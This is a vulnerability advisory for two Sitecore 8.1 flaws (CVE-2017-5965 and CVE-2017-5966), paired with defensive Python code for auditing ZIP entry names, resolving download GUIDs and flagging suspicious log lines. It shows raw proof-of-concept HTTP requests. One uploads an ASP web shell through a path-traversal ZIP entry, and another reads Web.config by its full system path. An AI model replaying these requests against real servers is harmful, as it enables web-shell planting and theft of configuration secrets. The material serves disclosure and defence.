
Authenticated Arbitrary File Upload via Sitecore Package Manager (CVE-2017-5965)

Chris McCurley
  • CVE(s): CVE-2017-5965, CVE-2017-5966
  • Vendor: Sitecore
  • Product: Sitecore
  • Version(s) affected: 8.1 Rev 151207
  • Fixed version: None

Authenticated Arbitrary File Upload via Sitecore Package Manager (CVE-2017-5965)

This vulnerability was subject to a 90-day disclosure timeframe following notification to the vendor in February 2017.

Using the Sitecore administrator web console, an authenticated administrator can upload files to any location on the web server file system. This is due to the way the package manager handles the ZIP file containing the package to be installed: entry file names are used as given when the archive is unzipped, so relative path components in them are not rejected.

To replicate this issue, create a ZIP file containing an entry whose file name includes ..\..\Website\sitecore\. The example below uploads a ZIP file containing a file named ..\..\Website\sitecore\asp-shell.asp. The Unzip parameter must be set to 1 so that the archive is unzipped automatically once uploaded. The Overwrite parameter can be set if existing system files, e.g. web.config, are to be overwritten.

POST /sitecore/shell/applications/install/dialogs/Upload%20Package/UploadPackage2.aspx?di=<RANDOM-GUID> HTTP/1.1
Host: sitecore-instance
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sitecore-instance/sitecore/shell/applications/install/dialogs/Upload%20Package/UploadPackage2.aspx?di=
Cookie: <..snip..>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------14217273362068279630257947421
Content-Length: 2160
<..snip..>
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="Unzip"
1
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="Overwrite"
0
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="File326370957"; filename="asp-shell.zip"
Content-Type: application/zip
<..binary ZIP data; the archive contains a single entry named ..\..\Website\sitecore\asp-shell.asp..>
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="File326371057"; filename=""
Content-Type: application/octet-stream
-----------------------------14217273362068279630257947421--

After the file extraction has automatically completed, the web shell asp-shell.asp is accessible at https://sitecore-instance/sitecore/asp-shell.asp.
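The defect above is the classic "zip slip" pattern: the extractor trusts entry names. The following added example (written for this page, not Sitecore's code) reimplements the check the package manager should perform before unzipping. It normalises both Windows and POSIX separators, rejects absolute paths, drive letters, UNC paths and any name that collapses to a leading `..`, and refuses to extract the whole archive if any entry fails. The sample archive, the entry names and their contents are constructed; the traversal entry reuses the entry name from the proof of concept, with placeholder content.

```python
"""Audit a package ZIP for path-traversal entry names before extracting it.

Added example, not Sitecore code. Rejects any entry whose name would escape
the extraction directory, whichever path separator the archive uses.
"""
import io
import posixpath
import re
import zipfile
from pathlib import Path

_DRIVE_RE = re.compile(r"^[A-Za-z]:")


def is_safe_entry_name(name: str) -> bool:
    """Return True only if `name` stays inside the extraction root."""
    if not name or "\x00" in name:
        return False
    # Archives built on Windows carry backslashes; treat both separators alike.
    normalized = posixpath.normpath(name.replace("\\", "/"))
    if posixpath.isabs(normalized) or _DRIVE_RE.match(normalized):
        return False  # rooted path, UNC path (//server/share) or drive letter
    # After normpath, any escape collapses to a leading ".." component.
    return normalized != ".." and not normalized.startswith("../")


def audit_package(zip_bytes: bytes) -> dict:
    """Classify every entry in the archive as 'safe' or 'unsafe'."""
    result = {"safe": [], "unsafe": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            bucket = "safe" if is_safe_entry_name(info.filename) else "unsafe"
            result[bucket].append(info.filename)
    return result


def safe_extract(zip_bytes: bytes, dest) -> list:
    """Extract only after the whole archive passes the audit; refuse otherwise."""
    report = audit_package(zip_bytes)
    if report["unsafe"]:
        raise ValueError(f"refusing to extract, traversal entries: {report['unsafe']}")
    dest = Path(dest).resolve()
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = (dest / info.filename.replace("\\", "/")).resolve()
            # Belt and braces: re-check containment on the resolved target path.
            if target != dest and dest not in target.parents:
                raise ValueError(f"entry escapes destination: {info.filename}")
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(str(target.relative_to(dest)))
    return written


def build_sample_package(entries: dict) -> bytes:
    """Build an in-memory archive from {entry name: text content} (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample: two legitimate package entries, the traversal entry name
# from the proof of concept above (placeholder content), and a nested escape.
SAMPLE_PACKAGE = build_sample_package({
    "package.xml": "<package/>",
    "files/Website/sitecore/ok.txt": "fine",
    "..\\..\\Website\\sitecore\\asp-shell.asp": "placeholder content, not a shell",
    "files/../../escape.txt": "placeholder",
})

if __name__ == "__main__":
    print(audit_package(SAMPLE_PACKAGE))
```

Running the audit on the constructed archive reports the two legitimate entries as safe and both traversal entries as unsafe, and `safe_extract` refuses the archive before touching the file system. Normalising with `posixpath.normpath` matters: a name like `files/../../escape.txt` contains no leading `..` yet still escapes, and only the collapsed form reveals it.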

Authenticated Arbitrary File Download (CVE-2017-5966)

A web application administrator can download arbitrary files that exist outside the web root directory. By design, the file parameter is populated with a GUID that identifies a specific file stored within the application. However, by supplying a full system path in this parameter instead, any file on the system can be downloaded (subject to the privileges of the Sitecore application's process).

GET /sitecore/shell/download.aspx?file=c:\full\path\to\file\Web.config HTTP/1.1
Host: sitecore-instance
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sitecore-instance/sitecore/shell/Applications/Reports/LogViewer
Cookie: <..snip..>
Connection: close

The HTTP response returns the requested Web.config as an attachment (a portion is shown below):

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24892
Content-Type: application/octet-stream; charset=utf-8
Server: Microsoft-IIS/8.5
Content-Disposition: attachment; filename="Web.config"
Content-Transfer-Encoding: binary
X-UA-Compatible: IE=Edge,chrome=1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
x-frame-options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="sitecore" type="Sitecore.Configuration.ConfigReader, Sitecore.Kernel" />
    <section name="log4net" type="log4net.Config.Log4NetConfigurationSectionHandler, Sitecore.Logging" />
    <section name="packageInstallation" type="Sitecore.Ship.Infrastructure.Configuration.PackageInstallationConfiguration, Sitecore.Ship.Infrastructure" />
    <section name="nancyFx" type="Nancy.Hosting.Aspnet.NancyFxSection" />
  </configSections>
  <connectionStrings configSource="App_Config\ConnectionStrings.config" />
  <appSettings>
  (...REDACTED...)
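The download handler's mistake is accepting anything in `file` that happens to be a usable path. The added example below (written for this page, not Sitecore's code) shows the hardened shape: the parameter is accepted only if it parses as a GUID and that GUID is present in a registry of downloadable files, so the user-supplied value never reaches the file system. It also includes a detection routine that scans IIS W3C-style log lines for download.aspx requests whose `file` value is not a registered GUID, which is what a defender would hunt for after a disclosure like this. The registry entries, GUIDs, client addresses and log lines are all constructed; the two path-like values reuse paths that appear in the request and response above.

```python
"""Hardened lookup for a download.aspx-style `file` parameter, plus a log check.

Added example, not Sitecore code. Only a registered GUID is resolved to a file;
a path in the parameter is rejected before any file system access.
"""
import re
import uuid
from urllib.parse import parse_qs

# Constructed registry: GUID -> relative path under the download area.
FILE_REGISTRY = {
    "6f1c2b3a-8d4e-4f5a-9b6c-7d8e9f0a1b2c": "exports/site-report-2017-02.csv",
    "0a1b2c3d-4e5f-4a6b-8c7d-9e0f1a2b3c4d": "logs/log.20170214.txt",
}

# Values that look like a file system path rather than an identifier:
# drive letter, UNC prefix, rooted path, or a traversal component.
_PATH_LIKE = re.compile(r"^(?:[A-Za-z]:|\\\\|/|\.\.)")


def resolve_download(file_param: str):
    """Return the registered relative path for a GUID, or None if rejected."""
    try:
        key = str(uuid.UUID(file_param.strip()))  # canonical lowercase form
    except (ValueError, AttributeError, TypeError):
        return None  # not a GUID at all: absolute path, traversal, anything else
    return FILE_REGISTRY.get(key)  # None for a GUID that is not registered


def flag_download_requests(log_text: str) -> list:
    """Return (client, file value, reason) for download.aspx hits whose
    file= parameter is not a registered GUID.

    Expects constructed W3C lines with the fields:
    date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
    """
    flagged = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        _date, _time, _method, stem, query, client, _status = line.split()
        if not stem.lower().endswith("/download.aspx"):
            continue
        params = parse_qs(query) if query != "-" else {}
        for value in params.get("file", []):  # parse_qs already URL-decodes
            if resolve_download(value) is None:
                reason = "path-like" if _PATH_LIKE.match(value) else "unknown-id"
                flagged.append((client, value, reason))
    return flagged


# Constructed sample log: one legitimate download, two path-supplied requests,
# one unregistered GUID, and an unrelated page hit.
SAMPLE_LOG = r"""#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2017-02-14 10:01:02 GET /sitecore/shell/download.aspx file=6f1c2b3a-8d4e-4f5a-9b6c-7d8e9f0a1b2c 10.0.0.5 200
2017-02-14 10:02:11 GET /sitecore/shell/download.aspx file=c:\full\path\to\file\Web.config 10.0.0.9 200
2017-02-14 10:03:40 GET /sitecore/shell/download.aspx file=..%5C..%5CApp_Config%5CConnectionStrings.config 10.0.0.9 200
2017-02-14 10:04:00 GET /sitecore/shell/download.aspx file=ffffffff-ffff-4fff-8fff-ffffffffffff 10.0.0.7 404
2017-02-14 10:05:00 GET /sitecore/content/home - 10.0.0.5 200
"""

if __name__ == "__main__":
    for client, value, reason in flag_download_requests(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value}")
```

Parsing with `uuid.UUID` rather than a hand-written regex accepts the usual GUID spellings (braces, upper case) while rejecting every path form in one step; the registry lookup then turns the identifier into a server-chosen path. On the detection side, the `unknown-id` reason is worth keeping separate from `path-like`: a burst of unregistered GUIDs from one client is enumeration, whereas a single path-like value is a direct attempt at this issue.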

Disclaimer

The information in this article is provided for research and educational purposes only. Aura Information Security does not accept any liability in any form for any direct or indirect damages resulting from the use of or reliance on the information contained in this article.